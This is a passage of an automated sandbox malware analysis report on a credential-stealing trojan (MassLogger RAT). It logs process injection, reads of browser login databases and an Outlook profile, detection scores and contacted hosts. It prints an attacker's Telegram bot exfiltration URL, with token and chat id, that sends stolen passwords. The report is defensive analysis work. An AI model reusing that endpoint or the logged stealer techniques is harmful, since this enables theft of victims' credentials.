                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8CC008Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeQueries volume information: C:\Users\user\Desktop\z87sammylastborn.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\z87sammylastborn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                311
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                1
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                z87sammylastborn.exe51%VirustotalBrowse
                z87sammylastborn.exe76%ReversingLabsByteCode-MSIL.Trojan.MassloggerRAT
                z87sammylastborn.exe100%AviraHEUR/AGEN.1306813
                z87sammylastborn.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://api.telegram.orgd0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.48.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgRegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://reallyfreegeoip.org/xml/8.46.123.189lRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botRegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://checkip.dyndns.comdRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.org/qz87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgdRegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/8.46.123.189dRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://reallyfreegeoip.orgRegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgdRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.orgRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://api.telegram.orgdRegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://checkip.dyndns.orgRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://api.telegram.orgRegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.org/dRegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000003.00000002.4534096761.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/bot-/sendDocument?chat_id=z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.48.1
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  132.226.247.73
                                                                  checkip.dyndns.comUnited States
                                                                  16989UTMEMUSfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588302
                                                                  Start date and time:2025-01-10 23:43:36 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 24s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:z87sammylastborn.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 78
                                                                  • Number of non-executed functions: 3
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.175.87.197
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  TimeTypeDescription
                                                                  17:44:38API Interceptor10259335x Sleep call for process: RegAsm.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.48.1NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                  • www.axis138ae.shop/j2vs/
                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                  • twirpx.org/administrator/index.php
                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                  • www.antipromil.site/7ykh/
                                                                  149.154.167.220vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      132.226.247.73Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      checkip.dyndns.comvnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      reallyfreegeoip.orgvnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.32.1
                                                                                      PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.64.1
                                                                                      7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.80.1
                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      api.telegram.orgvnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSvnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.96.3
                                                                                      xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.26.12.205
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.80.1
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.162.153
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.223.109
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.32.1
                                                                                      PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.64.1
                                                                                      TELEGRAMRUvnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
